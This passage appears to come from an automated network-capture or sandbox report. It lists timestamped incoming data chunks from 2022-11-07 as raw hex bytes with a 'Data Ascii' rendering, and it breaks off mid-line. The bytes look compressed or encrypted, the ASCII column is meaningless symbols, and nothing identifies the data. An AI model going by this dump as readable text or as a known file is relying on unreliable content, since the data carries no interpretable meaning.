9e ec e0 df a5 dc 47 b6 71 08 99 99 cf 23 90 7c 0d f8 17 da Data Ascii: \gln,\DcT?AGI&%pu! 1e#VzRg2wA__ggb;"NcVa)>f2@=kAZ+;v"K0f('}^x^oJ1sZ{,VrQ-{M(o8?54mT;`RMjTt<DGq#\|
2022-11-07 22:49:09 UTC	8697	IN	Data Raw: e9 2e 7a 83 1a 43 a8 7a 62 41 30 8e 87 f4 ea 70 05 a3 4d f0 c5 d1 5f cb 19 d6 e6 91 89 91 e8 87 bf 63 dd 85 24 94 3d 01 00 80 13 af 81 c8 b3 60 44 e2 08 0d 95 53 3c 82 0a 31 98 43 84 3e 8f 61 2f 84 d0 21 c0 ab 61 08 b4 89 5e fe dc 99 7b 6d 03 4d 75 26 fe 4b 13 79 d7 5c 00 95 75 12 a1 a7 79 8a 42 03 50 59 a0 9e 22 60 a8 95 89 c5 e7 4c 43 cb 33 74 4f 13 f6 b2 ea 31 2a 84 ba fd 3b f1 67 0f f8 b2 6b 27 58 b7 33 dd 89 7e 69 22 07 34 8f 21 3a 3b 0c a9 4e 8a eb 6e c0 11 24 82 da d3 dc f7 e8 a9 61 ad 20 a6 b9 fd 66 29 09 44 1c ac c1 9a d6 a7 a8 a7 67 f9 c5 a7 07 9a 98 b1 09 2e 97 17 3a f6 28 a8 a7 e9 d9 48 46 3a de 36 ef de fa ed 7e 7f 03 f1 64 02 ee 26 22 bf 7b ca 92 7d a1 4c c1 3d a1 9d 50 0c 00 94 b5 ab 4f fc 55 c5 a7 af 76 c5 90 f4 c0 d9 85 a8 7b f1 35 aa 58 Data Ascii: .zCzbA0pM_c$=`DS<1C>a/!a^{mMu&Ky\uyBPY"`LC3tO1*;gk'X3~i"4!:;Nn$a f)Dg.:(HF:6~d&"{}L=POUv{5X
2022-11-07 22:49:09 UTC	8713	IN	Data Raw: 74 24 d2 70 ed e1 f8 c1 c0 fa 3b fd 58 bf 59 a4 f7 47 dd 39 bc 70 6f de ac fd 88 c2 01 dc 47 0a 24 a8 3a 5a 37 35 03 d5 49 21 54 bb d9 b5 0c e9 60 22 b2 2c d0 4d dc d9 af 63 48 70 f1 ab f7 a9 46 ff c9 94 a6 da 5d 0a be d6 1f 16 4c ac 1d 6c 61 70 b7 1f 37 ee f4 b8 f0 56 63 2c 18 02 de 0f 3f bf aa 34 4d 63 94 7b 36 44 64 6e cd 55 9a 0c 09 e1 b0 eb 17 2b d2 71 96 28 2d ad f3 b1 91 88 ee 5d ca 30 a6 1b d1 0c c5 ef c1 ec e8 fb a8 12 6a c2 0e 0b ae 6d f7 48 e2 3c ac b1 79 b9 f2 9a ca 28 8b 03 d5 91 29 a1 fa b0 fe 91 c7 91 a5 e1 0c 3c a8 88 32 0c f9 fb d5 7a 66 ec 50 9b 6b 43 ff 98 26 28 30 6a a7 8b a1 c4 30 f8 19 46 d1 c0 86 b5 a8 06 69 af 84 9e 9b 17 2b 89 c3 98 85 7c d4 b0 93 4b 4b 34 e3 4f b9 46 53 77 f6 c5 c2 e4 ee 71 c6 41 cf e4 a3 8c cf 1a ab c4 b1 51 be Data Ascii: t$p;XYG9poG$:Z75I!T`",McHpF]Llap7Vc,?4Mc{6DdnU+q(-]0jmH<y()<2zfPkC&(0j0Fi+\|KK4OFSwqAQ
2022-11-07 22:49:09 UTC	8729	IN	Data Raw: b6 d1 bf 7f c0 cf 79 37 c1 1d ba ab 49 26 4c 21 e1 b2 62 95 64 41 93 60 00 6f ac c5 74 a7 27 29 d4 ae e8 08 0b a3 2b f8 e5 9e 6b 1d 99 61 fc 6d 8f 6f 68 78 65 f7 2c 85 c4 ff 52 f4 82 3d 42 89 9c e7 de 3e ef cf 19 03 ef 72 67 ea d7 7e c2 d9 cc 0d 4d 04 d2 b7 19 49 43 f7 55 4c 7d 20 35 9d 2b f5 57 4b da 38 ff ed dc a6 c3 8b da 6c f4 9a 58 1a c6 04 5c 39 66 0d 14 21 a7 e6 37 87 ce 49 54 89 57 a9 1e 83 73 e7 ad 2e ca 8b 78 1b b4 33 66 d1 a8 ca f2 8e ba 54 d7 c8 aa 69 3c c9 13 28 af d5 bc 65 ba 77 b7 6f 1f 3f 51 96 21 e9 49 1a 5d 18 69 4d 41 62 c4 b9 96 84 58 78 3f 2f 87 fa 0b f4 c4 f8 3f 64 a1 91 fa b2 f6 3a 95 e4 fa e1 5f f2 9e 55 52 12 39 f3 b0 39 73 60 a4 eb ad 12 1c c7 04 9c 06 12 49 78 df d2 e3 c5 fe 89 a8 8d 16 f5 cc ca fb 8b 37 db 77 f5 fb a7 97 5c 2c Data Ascii: y7I&L!bdA`ot')+kamohxe,R=B>rg~MICUL} 5+WK8lX\9f!7ITWs.x3fTi<(ewo?Q!I]iMAbXx?/?d:_UR99s`Ix7w\,
2022-11-07 22:49:09 UTC	8745	IN	Data Raw: e7 dc 3d 6a 18 c8 9d 78 76 25 9e 5d a8 f5 ad 7a 4b e3 5e f7 61 ce d7 d4 f7 d0 98 c6 42 36 09 92 2e ad 67 7e 23 2f e8 a9 61 fc 87 66 eb b2 5b ef 2e 3a 59 b9 25 ab 9f 98 09 da 50 f6 06 15 b9 86 50 7d 70 b3 0b ba 67 2e bb d1 48 7b 8d ee eb 15 34 a8 41 f9 ae a9 6a 21 fa 2c 87 ae 27 2b ea ad 2f 96 73 88 70 9c f3 dc c6 f2 5f f6 e0 33 c6 f5 8a df ad f6 e5 bf 07 56 c5 d2 ea 99 93 aa ee db 16 98 92 67 65 3e 88 7f 53 98 eb 7a 7b 8c 72 fe 66 f7 d7 a1 93 4f 2d bc 8f 80 14 f5 b6 47 cc 92 67 5d c8 c1 6f 7b db 8a 51 f3 9f 9a 9f a5 c4 2c fe 3c 29 2a d3 7b 3e 70 4a 9d 50 fd 71 8e f9 89 49 6e 46 e7 dc 8e 5e b5 ee e1 14 7f f9 68 ed 3f 77 a3 a8 b6 d2 a5 11 c6 53 37 e7 c7 b7 35 b6 3a 28 99 49 e7 9a c4 9d 0e cc 58 6a bc 3e 50 f7 2a 4b 57 3c 3c bb 7e 53 69 a8 2b fd 71 ac dc cb Data Ascii: =jxv%]zK^aB6.g~#/af[.:Y%PP}pg.H{4Aj!,'+/sp_3Vge>Sz{rfO-Gg]o{Q,<){>pJPqInF^h?wS75:(IXj>PKW<<~Si+q
2022-11-07 22:49:09 UTC	8761	IN	Data Raw: 36 e0 fb 15 b1 f8 b5 15 1d 0c 11 ac 44 c3 a3 40 70 23 a9 4f ae a2 8c 04 d7 c5 4c 0e 10 c9 d2 a6 cb 8b d1 2c e9 79 e3 74 7d b1 17 60 44 0e 06 11 b4 8f 0c e7 e8 59 87 0a 3b 68 e4 df a9 bb 15 de 55 63 a5 37 f9 d4 8f a7 67 10 55 f6 cc 93 78 ea 7f 19 0e 36 44 e6 ac 9e 43 d0 9a 87 c5 f3 f5 6b 83 2c ae 52 c9 54 58 a2 0c 4c a8 ef 41 d7 91 1d c2 ef db 5d 12 bc e2 d9 79 91 5c be dc 29 ce 67 b9 02 fc 50 c9 bc 59 a1 b5 ed 74 32 71 8d 8c e1 0b 97 f7 54 70 c0 8e 0b 23 fa a3 f9 55 ec 45 4c 42 32 86 6d 42 9a 83 cc a1 2b cd f4 97 e6 b1 2a 6f 47 08 1d f9 43 ce 56 bf 07 ee 61 19 df 69 4d 76 8a 03 3d ed ec 61 c9 a2 76 a1 4c 8a 16 6b aa 9d df 5e ce de 19 c0 7f c9 52 f4 a7 ee d3 5a ba 06 e9 74 83 2f c5 40 93 f6 c2 5e 71 e0 e3 36 ae 22 92 72 5e 7f 67 b9 7a 3c cd 18 57 df cd 41 Data Ascii: 6D@p#OL,yt}`DY;hUc7gUx6DCk,RTXLA]y\)gPYt2qTp#UELB2mB+*oGCVaiMv=avLk^RZt/@^q6"r^gz<WA
2022-11-07 22:49:09 UTC	8777	IN	Data Raw: 81 80 e2 4b 6f 27 1a 0f a6 20 6e bd 5d 10 14 52 b8 d8 4e 35 48 23 68 4b 7f b0 29 21 08 ef f1 50 e7 f8 b5 b9 d0 82 c7 64 5f 40 e9 1b 16 8c ab ac 27 c4 ef 9c 68 8c dc f6 13 d4 a9 78 04 74 cc 10 d4 a4 00 c3 76 47 26 05 84 aa 32 74 55 26 c6 7b e9 5b 86 6e 27 63 d3 f9 55 2b dc 39 78 06 6e f4 65 ff d7 7b 82 18 99 1b 3c 27 e7 09 4b 12 a1 ed da 90 b9 0f 49 8c 45 20 aa 1f 84 31 3e 06 8b 62 64 12 ea 5f af f9 f0 ca 2a fc 9e 08 39 a7 4d a0 39 63 93 95 65 c8 09 3f 49 bd bb bf 36 36 b9 41 51 66 af 01 d9 24 14 4b 13 44 80 ee 3d 35 5d e5 55 c7 10 88 26 33 30 8d 4f 1f 22 f6 de 04 88 c8 84 4c 77 1a 55 3e 42 75 78 30 79 e8 23 0e af f9 b8 c1 40 20 36 e0 ae 75 ad 85 ba aa 85 ce 30 f1 54 87 2a 2d 0a c0 b6 5f a3 01 d5 fa b7 bd c3 df e1 22 d5 f3 b3 6a d9 96 0a 08 fd 9c 5e 6a ff Data Ascii: Ko' n]RN5H#hK)!Pd_@'hxtvG&2tU&{[n'cU+9xne{<'KIE 1>bd_9M9ce?I66AQf$KD=5]U&30O"LwU>Bux0y#@ 6u0T-_"j^j
2022-11-07 22:49:09 UTC	8793	IN	Data Raw: 86 23 c0 78 57 52 c0 85 41 07 0c a8 52 04 44 b1 c6 21 ef 52 6f 3b cd cc 87 b8 1e 96 84 16 e6 3a f5 88 29 67 d1 9f 18 8a a5 a1 85 1a 8d cf 0c 38 30 28 85 82 f0 b5 92 14 12 a0 c7 8f 45 8a f4 3c 07 49 f7 44 85 66 07 b7 f1 62 84 cc 66 16 42 42 ce 0e 56 11 08 0d 8d f9 10 ad a8 f3 b7 7a 30 32 a1 ba c1 f7 5f 96 42 dc 9b 6d f9 63 09 32 71 d1 8d ea df 72 86 5a 2e 2f 21 70 7a 3b 6b c5 c0 a0 82 be f6 53 d4 4a 04 02 7d d2 53 d0 fd d3 65 c8 93 e0 d2 60 e1 b4 28 38 c0 b4 1b 81 29 28 3c c2 96 e0 76 00 eb 39 57 04 58 9e df b0 b8 6f 75 40 ce d5 e5 d8 e2 0c 63 55 48 bf 76 06 4d ee b1 04 92 fc b7 2e bf 75 c8 ed 5d 0a e4 16 ab f9 4a ac e9 6e 06 e3 9f 38 0f 58 d6 5e 19 88 f1 81 63 22 61 24 7c e6 62 9c 80 3c 32 90 e2 25 df 23 01 fe 40 3a 24 7b 4a 70 38 69 0a fa 62 98 03 88 14 Data Ascii: #xWRARD!Ro;:)g80(E<IDfbfBBVz02_Bmc2qrZ./!pz;kSJ}Se`(8)(<v9WXou@cUHvM.u]Jn8X^c"a$\|b<2%#@:${Jp8ib
2022-11-07 22:49:09 UTC	8809	IN	Data Raw: 87 9b 83 e4 b3 35 f3 2a 1c a7 ce 60 82 a4 e6 83 7c e3 d4 2e 56 c3 8e df 93 9f aa 1d 56 ca e2 1d 7e 4d 75 7a 28 28 0b 9e e6 74 9d cd 84 18 9c f9 36 8c be cc f4 7b a8 a5 f2 f7 99 8d 5d 8f a5 19 e5 1d ba 8f 27 6f 6b ed c2 3c 78 4f 61 63 a5 93 1f e9 d2 57 3f 51 dd 44 c3 d1 43 44 1b 7b 94 67 52 5e 14 5f 5d 32 3e 3f 9a 3a c5 3f 16 5f 53 89 f9 38 48 22 6b e1 bc e5 f7 54 1c 5e 57 35 4f 8c 51 46 bf e6 f8 75 7d a1 66 ed 3c 33 32 2f 2e b1 de 41 d6 83 cd 22 6a 7c 72 f5 83 d9 26 f3 ce 4b c3 7b c2 c9 15 fa 5d 63 69 2e 79 15 5f 07 ce 42 5b d8 de c7 76 5b 3f ff 73 32 fa 27 49 33 9e 0d d7 34 f5 fe fc f1 a3 ef 14 45 1b 86 cd c5 66 85 8a 0a 4e 60 d2 63 fb 9c f3 b7 bf cd 42 f1 19 11 4d 2c df 68 53 d8 bf f1 9d fc 9e e5 fb 97 f6 d9 ef 92 60 c5 1a f9 40 10 6e 71 07 2f 24 e5 f1 Data Ascii: 5*`\|.VV~Muz((t6{]'ok<xOacW?QDCD{gR^_]2>?:?_S8H"kT^W5OQFu}f<32/.A"j\|r&K{]ci.y_B[v[?s2'I34EfN`cBM,hS`@nq/$
2022-11-07 22:49:09 UTC	8825	IN	Data Raw: 04 b3 0a 17 bd f6 84 7a 20 1c 57 39 f6 63 bd 4b 23 f9 ed 9b f7 fc 81 1f fd 98 0b 1d 38 ef 4d 7c 23 30 ed d2 e0 ac 42 ed 04 6f 55 5d 54 37 1a ff 4d 1a bc 58 87 04 19 06 79 9f b3 91 58 ce 47 29 02 8a 3f 77 f7 27 3a 93 42 1e 20 de 15 ba ba ef d2 9d 0a de 6d 6a 4b 3a 5f dd 52 14 a6 ec 4f 33 52 26 7b 25 54 78 51 52 a7 cc 6f 7c 29 fe e6 e9 15 4a 35 aa 68 e2 d2 a9 31 bd b2 2e b7 4d 83 32 bf 85 fc 4d 57 81 ec 8d 9b 18 dc 6f b3 03 19 a9 f8 bb 49 74 e5 5f 88 1d bb ec 78 93 ed 0a b7 8f 2e f5 12 d1 a7 67 2f 0e be 7e b1 27 bf 57 2b f4 e1 77 a8 20 7a a7 f1 b3 ae 1f 6f c5 ea 43 94 30 4c bc f5 d3 e2 a2 79 ee ef 3f e5 6f 42 b2 d8 3d 5d 32 f7 28 2d 52 4a 54 14 b9 de b0 42 af 76 bb 3b f2 f9 42 fa 44 bd fd 7a 83 1e 72 32 3d 1f de a0 1a d1 ba d3 f4 88 2d e1 25 0c 43 b9 6f 4a Data Ascii: z W9cK#8M\|#0BoU]T7MXyXG)?w':B mjK:_RO3R&{%TxQRo\|)J5h1.M2MWoIt_x.g/~'W+w zoC0Ly?oB=]2(-RJTBv;BDzr2=-%CoJ
2022-11-07 22:49:09 UTC	8841	IN	Data Raw: 73 b7 18 af 6c 69 63 5a c6 f9 53 47 9a c2 bb 7b 20 3e c6 60 5a 64 8a b4 68 00 13 ef f8 aa 4d ca 7f cb 61 a7 8b c3 ee ab 68 59 02 49 4d 6b d3 bb 76 9f 54 aa ad 07 6f 92 3b 32 8c 61 91 07 83 82 dd 75 ba 09 6d 02 0a 24 84 c9 bf 87 63 d7 4d bf d7 66 4f 4c 26 fd c9 0d 5a c7 f1 17 09 ac 7d e2 0d 30 68 0a e1 80 7b 89 f2 42 e2 ec a9 af ee db fa b6 9a 9e ae 8b bd 34 dc 62 bb 79 51 c0 91 61 80 fa 7a 23 eb 91 c2 76 e7 d6 fb 63 07 db 42 3b 8e 77 9c dd d9 91 27 39 ab 83 c3 1b 31 bf 3f 2a 7e a2 4b e4 86 01 9d d3 de b8 af eb 81 d7 12 b3 fd 45 ab 06 52 6a 01 b4 c8 70 93 bf 43 8a 0e 7f e3 44 d0 e1 a1 fb ae 17 9e 95 bc 65 54 9c d7 ca cf de da 26 dd ce 50 ed 4f a4 5a 33 2e 9e 25 0b cb 0c 2b fc c6 df 7c 5f ce fc 50 67 c9 69 de 75 8e 3f d6 99 fb 30 af bc 72 a8 6f 3b e8 dc b6 Data Ascii: slicZSG{ >`ZdhMahYIMkvTo;2aum$cMfOL&Z}0h{B4byQaz#vcB;w'91?*~KERjpCDeT&POZ3.%+\|_Pgiu?0ro;
2022-11-07 22:49:09 UTC	8857	IN	Data Raw: 42 43 f7 59 7f 8e ad 14 5a 47 da 8a 8f 65 ad 27 55 7e 72 cd 4b ed 5d f0 38 d2 b1 34 ba bb 6a 5c c4 f8 27 be eb fd e2 7e ce 61 c8 97 5b e7 0f c0 5b a6 d9 7a 31 b4 41 21 01 73 6c 14 87 63 1e 3b 22 a6 d7 3a 86 c9 92 f1 4d 9b 56 f0 bd 6c 3c 17 53 90 68 c0 b5 da b9 fd f9 b6 4f 2e 37 4c 1e 43 67 fe 26 15 ee 18 97 f6 db ab 6d 59 36 8d ff 6d c5 db 3e b8 4a 7a ac 22 e6 45 79 d7 e5 5c 19 e5 bd 0f 8e 42 b3 d3 d6 be 62 06 b7 eb 23 ad 77 8c 43 94 ce 0d 8a b7 ce 37 be 48 88 33 5c 51 68 8a cc db 1c ed 57 e5 12 0f ee 56 56 36 4a 07 a4 cd 6c 26 e6 a6 35 bc f2 ff e5 f9 9d fb f8 27 eb d2 a3 2e 62 39 c2 b2 ca 6e cc 63 d9 b5 b2 0f 9b 19 c6 e4 11 05 a4 ab 96 7e 1f cb 25 6c 84 7a 9c d5 17 15 75 67 af 61 85 72 6e 6e fb 8f 3b 3a 90 e2 2a 0f 05 bf ae 96 be a5 7d d7 46 ca 0e a6 d3 Data Ascii: BCYZGe'U~rK]84j\'~a[[z1A!slc;":MVl<ShO.7LCg&mY6m>Jz"Ey\Bb#wC7H3\QhWVV6Jl&5'.b9nc~%lzugarnn;:*}F
2022-11-07 22:49:09 UTC	8873	IN	Data Raw: 15 dc de 5f e3 f4 2e 07 64 91 aa 7d a6 b0 ed 5f 91 d4 8e 0e 24 c6 64 7f 3e c5 ef 15 d4 a7 4c 2f 2b 3d dd 75 2e 3b 0c 4d 64 90 79 0e 82 3c ed 2d 81 c5 51 d0 65 b0 44 26 d5 7d ef fa e1 63 35 42 a0 15 ff 01 d4 13 3d 20 22 c2 87 db aa 33 25 c2 09 4d 7b c0 78 bb ee f1 c2 af a1 8e 2a 97 4a d6 03 ff cb 0c f9 94 48 b6 73 92 29 98 cf 9e 41 be 45 b0 28 71 d5 3b f0 8b f5 b5 00 c8 74 de 53 74 f1 3e 41 fa a9 f6 19 86 53 9b 21 d7 a5 12 f4 97 b8 fb da e4 73 42 3a cc ef 14 3e 44 5c ab fc 39 8c 2a 86 2d 4b d8 c5 34 d1 b0 c4 30 ab 88 2a e2 b2 ab 53 69 2a 29 91 6d 50 5c 56 28 0e 85 e8 3b aa 54 bc 7f 25 0e ba 7b 0c 84 a4 5d 27 5a 97 28 4d 1f 5d 0b ca ef a9 ac 05 be 2f 59 39 de c2 eb f3 07 d3 5e e0 32 7e 3c 23 fb 66 c8 5c 1c 10 7b f0 ef 5d 28 eb 51 6f 89 79 41 a3 71 d9 df be Data Ascii: _.d}_$d>L/+=u.;Mdy<-QeD&}c5B= "3%M{xJHs)AE(q;tSt>AS!sB:>D\9-K40Si)mP\V(;T%{]'Z(M]/Y9^2~<#f\{](QoyAq
2022-11-07 22:49:09 UTC	8889	IN	Data Raw: ee b1 44 48 66 4a 9e f8 16 f7 46 e5 c7 f5 b1 3a fe 41 7f 04 d9 ea e5 e4 d6 9d 38 ae d0 2d 32 fe b5 12 a8 de 9e 0d f4 4f 08 fb a6 22 08 2f b1 cb 0d 04 ba 51 06 a1 70 64 50 ed 93 f6 2d 23 92 48 f0 f7 1f e8 5a cf 67 e8 4b 9d 49 05 3c 0d 3f 6a 94 39 3d 92 5b 06 da f8 a8 e1 68 15 2c 52 10 40 88 8a c2 4e ba ae d9 45 f2 21 c2 80 50 92 35 00 68 7c 0a 7a d0 3f bc bc 59 2c c5 bc 64 17 be fb 82 1d 05 4d fd f5 5f 3e 86 93 77 91 d1 e6 ea 20 b3 64 0f 8d e9 29 00 a0 52 57 44 61 74 c3 c5 ff 7f 8f 7e 22 1c 0c 2d 42 4f 8f 64 a2 86 48 45 49 74 71 2f c7 90 eb 51 ad 40 c7 b0 25 9e 78 1f 65 25 27 c2 08 d1 6f c7 7f 4f 25 e5 5f db 7e 27 32 ce 86 fa 78 60 94 f3 f6 52 c8 2b 87 1a 4a 09 c7 05 11 b8 b0 23 1c 7f 45 ae ff 51 06 43 a5 06 ba 81 79 70 f5 1d 5c f1 06 41 21 34 d1 9d f6 76 Data Ascii: DHfJF:A8-2O"/QpdP-#HZgKI<?j9=[h,R@NE!P5h\|z?Y,dM_>w d)RWDat~"-BOdHEItq/Q@%xe%'oO%_~'2x`R+J#EQCyp\A!4v
2022-11-07 22:49:09 UTC	8905	IN	Data Raw: ff 96 0e d2 e9 2d ee f0 38 e8 fd 77 a9 7d 00 96 8b 33 40 54 0a 15 7a 81 c1 46 d1 9b f6 66 88 ba df 52 4a 51 59 43 ab 4d 19 6f 77 db 2e bf f8 35 40 88 fb 17 a4 46 2c 20 97 83 bd 60 29 c2 0e 45 a0 7a d6 a5 22 37 0c 95 59 d2 22 c6 40 8e fa 7e 9e cb d6 19 60 8b de b6 f2 05 19 1c 77 1b 93 50 f9 89 ff 3f ff 5e 07 0e 0d be 60 fe 2f 07 89 e1 b9 8a e5 2b e2 ee 4a 08 1d 30 58 dc a0 2f f2 72 1c 22 f2 d8 c4 89 a7 32 23 60 85 da d9 f4 61 09 24 8e 4b 8b 87 72 7d 81 b4 d4 71 8c 6e 58 d1 4e 66 19 e9 e7 b0 74 41 cf 2d 29 72 0e 5f d4 88 08 19 9d fb 72 36 7c de 5c 1b 84 7b 1c 2f 1b 7e 36 5f 91 a6 21 48 0e 17 71 6c ee 16 1f 2a 00 8a c2 f4 a4 38 0f 52 01 6c 8c ed 39 d8 5c 4c 77 e9 4d 73 9d c3 d2 d0 ae 2e 7e 79 2c 5d 9d 09 37 db 2e 97 cd fa d2 17 07 80 8c db 9f 88 e2 0a db 65 Data Ascii: -8w}3@TzFfRJQYCMow.5@F, `)Ez"7Y"@~`wP?^`/+J0X/r"2#`a$Kr}qnXNftA-)r_r6\|\{/~6_!Hql*8Rl9\LwMs.~y,]7.e
2022-11-07 22:49:09 UTC	8921	IN	Data Raw: 0d 27 9e 43 32 be d3 11 22 f3 42 c4 2e 46 02 51 0b d1 ca 7a 08 07 26 3b 8d 25 81 7e ea d2 f5 68 bf fa 12 6a f7 cb 2d 87 f6 a1 58 26 97 3f 3b b0 16 63 59 ce 7e 2d 1d 8c b1 c4 95 53 1a 9c a5 c7 bd 2b ba 3d f9 af 24 7c 26 41 92 ae 5b 26 72 a6 40 65 14 46 d4 4f 06 a5 df 25 b7 76 d6 60 16 b8 b2 23 54 2f 8e c9 66 4b 96 76 52 df 36 a9 72 81 03 6e ef fd 16 3d 43 99 30 2f df 7f 73 6d 7f a4 fb 33 43 e5 89 fe 87 0f bb ee 21 1f c1 9b 26 1a f9 9e 45 50 f1 fc ad 72 ce b9 81 24 d0 f6 42 e0 8c 15 ee 5c d0 26 fd d5 90 e3 96 85 ae b4 68 fe e3 ed 2f ed 0f a1 0d bf 63 79 6d 70 cf d6 e6 4a fb b1 d1 f4 8e 92 c4 a4 1f 56 55 36 1b 4d 2f 3d 08 32 1d 84 1a 2b 11 58 ec 52 8b 67 39 72 09 0a eb e8 2c 5b b0 3d 03 86 f8 94 9b 50 b0 ba 8a 19 1e f8 7e b0 6b 1b a6 f3 1a 17 7b 16 2a b2 9c Data Ascii: 'C2"B.FQz&;%~hj-X&?;cY~-S+=$\|&A[&r@eFO%v`#T/fKvR6rn=C0/sm3C!&EPr$B\&h/cympJVU6M/=2+XRg9r,[=P~k{*
2022-11-07 22:49:09 UTC	8937	IN	Data Raw: a9 a9 a1 37 9e 50 e2 f6 2a 9e 7e a9 58 2d 53 d7 dc 3d 2d fd 87 fc b2 54 ee 90 9a 03 c6 8c 2c a7 37 d3 cb 89 c7 7e 9e e1 13 22 e8 a9 78 f6 c7 51 c4 d5 cc ed b4 84 50 39 e9 8e f7 ba c0 e6 f7 00 e7 4f 12 1b 4a b8 c0 06 ee 85 df db 48 a9 e1 ee fd b2 22 81 3c 25 1d 07 5b 14 52 44 8a 67 2d cc 2f 88 c8 d2 f6 25 b4 3a b6 5a 9d 98 a6 75 2c 51 f4 33 ee 68 66 75 be 24 76 40 4a d7 11 24 16 8b 7a 19 69 a1 cd f4 53 34 b4 0a 37 18 a7 bb 20 84 e6 fb 93 b4 a5 7c cb b1 c6 08 4d 2d 75 04 92 90 68 6f 29 40 de 8d 23 da f4 fd 44 f3 87 d3 d6 b8 e1 de 6f c2 b6 70 78 9d 6f 25 f4 2d dc 2c 4d f2 22 5e 9c f8 53 7e 9f fa 53 db df 41 67 62 0b ed db d2 9c dd 11 b4 ff 62 3b b1 27 7e b6 9e 70 0e 2c b9 de 46 d0 c3 3f 9a 22 3f 77 ce 35 e8 7a fa 56 22 1e ad 27 7f f6 ec 6c 94 2c 79 7c da 5c Data Ascii: 7P*~X-S=-T,7~"xQP9OJH"<%[RDg-/%:Zu,Q3hfu$v@J$ziS47 \|M-uho)@#Dopxo%-,M"^S~SAgbb;'~p,F?"?w5zV"'l,y\|\
2022-11-07 22:49:09 UTC	8953	IN	Data Raw: 3a 33 7e 08 fb bc 09 44 f5 95 e0 3d dd 18 7a 7c ff 80 77 f4 9e 43 b9 3a 39 3a 80 77 82 08 f6 84 2b 53 74 8b db bf 94 a5 b7 2f bf ca fa ea 91 d2 8b 2a 41 2b 0c d7 9a a9 bf 7d c7 83 0d c3 db 62 ef 5b b5 47 bc 2e 71 71 13 1d e5 25 c8 12 e1 28 ab 60 de d0 d1 9f f4 a7 3e d2 cd df 60 d5 81 6f ea de db 7b 19 f3 d6 7e 1f b5 65 4c 09 9c 18 62 a8 58 70 b2 91 b8 31 13 0b e3 52 c6 fe 43 da 62 d6 52 c6 1c 6d 6d 16 9c bb ba 97 59 5b ac 27 90 a7 f3 cf 87 0d 04 df ae 0e b8 4e 67 35 bd 69 f4 f9 2b 22 67 98 76 9c e3 f7 a0 d2 b9 00 ac eb ff 62 7d 0c 49 8b 15 f9 f6 93 41 11 96 bb 20 82 70 cf 8c f8 90 39 66 fd 05 b5 08 37 e6 10 9c 66 31 a8 bd 7e 92 68 ac cc 10 5a d7 cc ef b7 fb ee ac cf 56 64 a8 68 a4 8b 4a 6d 97 5e 39 b0 cf 95 c6 a4 4b be 38 c1 ed 7e 83 8b ea 4c a9 6f 66 cd Data Ascii: :3~D=z\|wC:9:w+St/*A+}b[G.qq%(`>`o{~eLbXp1RCbRmmY['Ng5i+"gvb}IA p9f7f1~hZVdhJm^9K8~Lof
2022-11-07 22:49:09 UTC	8969	IN	Data Raw: 19 f0 36 a1 6d 3d fd c2 4b 9d 46 50 cb b8 d0 c3 af 1e ac c0 8e 50 9e 69 1a 93 98 f3 49 57 51 8a ba b5 c9 20 6b da 1d fb 07 46 f4 c4 d8 67 94 49 60 b9 92 61 47 4a e9 db af 6d 78 cb 82 f7 b9 f1 26 3f bc ff 0c 97 75 89 ca fd 31 4f 4e d5 a8 e6 17 2f cf a0 5a db e1 0c eb 2f f6 f3 82 08 33 32 25 4f ac 24 01 0c 94 ff e6 95 a8 4c 73 ac be 91 77 f5 62 ef d0 8c 97 ff 97 57 ca 4e 8d ee 68 2c 37 dd d1 8b c3 d2 27 d0 89 4e d4 3f d9 a2 80 45 74 3f 48 5b 05 e2 17 e5 12 c6 25 7c 37 0d 37 bb 62 71 f8 9e b3 15 6e fa 70 0a 78 18 67 b2 21 87 a1 23 f9 ba 34 b9 32 7f 7e a8 b1 56 ec 28 4b 0e 30 96 dc 3e 43 a3 e1 8e a1 94 ad 31 d6 a8 97 bb 9a 27 9b c7 30 63 af 79 1f 1a ad 87 f4 d9 52 87 59 f4 25 d5 47 0a 9e 1d be 6b ab 11 92 2c 63 51 1f 4d bf 8d 3a a5 52 06 9b fc 25 fd 37 72 e5 Data Ascii: 6m=KFPPiIWQ kFgI`aGJmx&?u1ON/Z/32%O$LswbWNh,7'N?Et?H[%\|77bqnpxg!#42~V(K0>C1'0cyRY%Gk,cQM:R%7r
2022-11-07 22:49:09 UTC	8985	IN	Data Raw: 58 8d b1 c9 8c 02 f3 dc 98 e5 ba 9c 8b 5a eb 66 bf bc 9c e8 58 0e 86 13 59 a4 69 b4 f3 9b 54 dd 75 8c 2a 7e 4b 5b 5a 71 44 fd f6 33 58 3a d2 03 79 b8 4f f6 45 fa 35 e8 de 33 0e 7d 23 74 f8 9b e5 8c c9 b3 a1 f5 33 cf dd 37 e8 43 b5 20 be b6 73 3c ed 49 9d ae 79 c5 47 33 3e 11 0c 58 57 d2 e0 06 fc ef 9f 98 11 97 8d 1b 54 0e 68 dd 91 d7 0b 8a 48 ae 0b 7b af 6e 72 42 95 6c 25 a9 5b 5c d5 35 2e 7e 7a d6 21 fb b0 dc 54 6c 8b 00 18 b0 51 57 18 92 ff dc d3 04 10 5b b7 b1 a4 76 13 ce 6a 54 e8 7f 0d 58 8a 65 ee a1 aa fd 61 44 37 44 37 4f 7d fa e9 94 ea dc f5 dd 20 b6 c3 e9 ea 08 70 e3 7b 44 9b dc b2 df 9a 64 d9 5a a0 f3 c1 66 5a 49 a5 2e e5 20 9d ca a3 bd 08 93 49 19 be d5 86 c8 59 0e 2a b9 65 68 93 79 a2 5d cb d3 18 5d 99 89 a5 aa 36 7b b6 a5 ed ba 62 8a 42 b1 e9 Data Ascii: XZfXYiTu~K[ZqD3X:yOE53}#t37C s<IyG3>XWThH{nrBl%[\5.~z!TlQW[vjTXeaD7D7O} p{DdZfZI. IYehy]]6{bB
2022-11-07 22:49:09 UTC	9001	IN	Data Raw: c2 b3 28 b5 92 cc 66 40 84 fa a3 93 56 25 00 46 99 7a 2f e8 2a 07 c4 f1 66 f7 c6 43 c8 7e 3d 5b 33 1f 4e d8 c2 30 4c 1b 88 07 0a b0 05 0a 07 df bc 66 81 32 1a bf 0a 0e a8 66 3b 0f 34 07 fc 8f 89 89 af 0b 22 06 0a 43 45 2e 35 d7 e2 16 cc a0 63 ea e9 9c 5e 04 00 8c 08 b3 da ec c5 32 99 cb 3e 2e 74 2b 56 81 fe 48 97 99 c4 27 4c 38 fb 6e 70 00 33 86 cb f9 81 db d1 31 c1 54 64 f7 c5 49 71 0f c9 f7 c3 44 e9 eb 29 0e 00 16 66 85 e3 6e 05 0d 00 bf 66 30 5b 0a 32 7f 06 9d 10 41 3b fa 71 33 dc 8e d4 3d f9 df bb 54 25 d8 78 72 52 ff df ff ff ef b2 